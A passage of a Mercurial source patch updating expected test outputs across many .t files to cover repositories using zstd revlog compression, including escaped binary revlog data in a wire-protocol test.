data (no-zstd !) + transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -164,8 +166,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds * (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds * (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*/sec) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -73,8 +75,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (*) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-tags.t b/tests/test-remotefilelog-tags.t --- a/tests/test-remotefilelog-tags.t +++ b/tests/test-remotefilelog-tags.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags streaming all changes - 3 files to transfer, 662 bytes of data - transferred 662 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 662 bytes of data (no-zstd !) + transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 665 bytes of data (zstd !) + transferred 665 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -53,6 +53,7 @@ featuresetup-test fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -24,6 +24,7 @@ dotencode exp-revlogv2.2 fncache + revlog-compression-zstd (zstd !) sparserevlog store diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -176,6 +176,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -60,7 +60,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes format-variant repo config default @@ -73,7 +74,8 @@ copies-sdc: no no no revlog-v2: no yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null @@ -92,7 +94,8 @@ copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no format-variant repo config default @@ -105,6 +108,7 @@ copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -38,6 +39,7 @@ exp-sparse fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -57,6 +59,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -31,6 +32,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -49,6 +51,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -62,6 +65,7 @@ exp-sqlite-comp-001=none fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -72,8 +72,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -94,8 +96,10 @@ $ hg -R local-stream book mybook $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/local-stream stream2 streaming all changes - 4 files to transfer, 602 bytes of data - transferred 602 bytes in * seconds (*) (glob) + 4 files to transfer, 602 bytes of data (no-zstd !) + transferred 602 bytes in * seconds (*) (glob) (no-zstd !) + 4 files to transfer, 621 bytes of data (zstd !) + transferred 621 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -64,8 +64,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 8 files to transfer, 827 bytes of data - transferred 827 bytes in * seconds (*) (glob) + 8 files to transfer, 827 bytes of data (no-zstd !) + transferred 827 bytes in * seconds (*) (glob) (no-zstd !) + 8 files to transfer, 846 bytes of data (zstd !) + transferred * bytes in * seconds (* */sec) (glob) (zstd !) updating to branch default 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd local-stream diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -46,9 +46,11 @@ $ hg bundle -a --type="none-v2;stream=v2" bundle.hg $ hg debugbundle bundle.hg Stream params: {} - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd !) $ hg debugbundle --spec bundle.hg - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd !) Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -832,7 +832,8 @@ Packed bundle $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg - writing 5330 bytes for 18 files + writing 5330 bytes for 18 files (no-zstd !) + writing 5400 bytes for 18 files (zstd !) bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest $ hg debugbundle --spec repo-packed.hg none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -78,7 +78,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no format-variant repo config default @@ -91,7 +92,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usefncache=no --color=debug format-variant repo config default @@ -104,7 +106,8 @@ [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugformat -Tjson [ @@ -164,7 +167,8 @@ }, { "config": "zlib", - "default": "zlib", + "default": "zlib", (no-zstd !) + "default": "zstd", (zstd !) "name": "compression", "repo": "zlib" }, @@ -323,7 +327,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no format-variant repo config default @@ -336,7 +341,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ hg debugformat --verbose --config format.usegeneraldelta=no --color=debug format-variant repo config default @@ -349,7 +355,8 @@ [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] + [formatvariant.name.uptodate|compression: ][formatvariant.repo.uptodate| zlib][formatvariant.config.default| zlib][formatvariant.default| zlib] (no-zstd !) + [formatvariant.name.mismatchdefault|compression: ][formatvariant.repo.mismatchdefault| zlib][formatvariant.config.special| zlib][formatvariant.default| zstd] (zstd !) [formatvariant.name.uptodate|compression-level: ][formatvariant.repo.uptodate| default][formatvariant.config.default| default][formatvariant.default| default] $ hg debugupgraderepo repository lacks features recommended by current config options: @@ -1293,7 +1300,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1329,7 +1337,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1368,7 +1377,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zstd zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1413,7 +1423,7 @@ revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1457,7 +1467,7 @@ revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode @@ -1501,7 +1511,7 @@ revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode diff --git a/tests/test-wireproto-command-rawstorefiledata.t b/tests/test-wireproto-command-rawstorefiledata.t --- a/tests/test-wireproto-command-rawstorefiledata.t +++ b/tests/test-wireproto-command-rawstorefiledata.t @@ -56,14 +56,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 527 + b'totalsize': 527 (no-zstd !) + b'totalsize': 530 (zstd !) }, { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] @@ -78,14 +81,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 584 + b'totalsize': 584 (no-zstd !) + b'totalsize': 588 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) + b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde 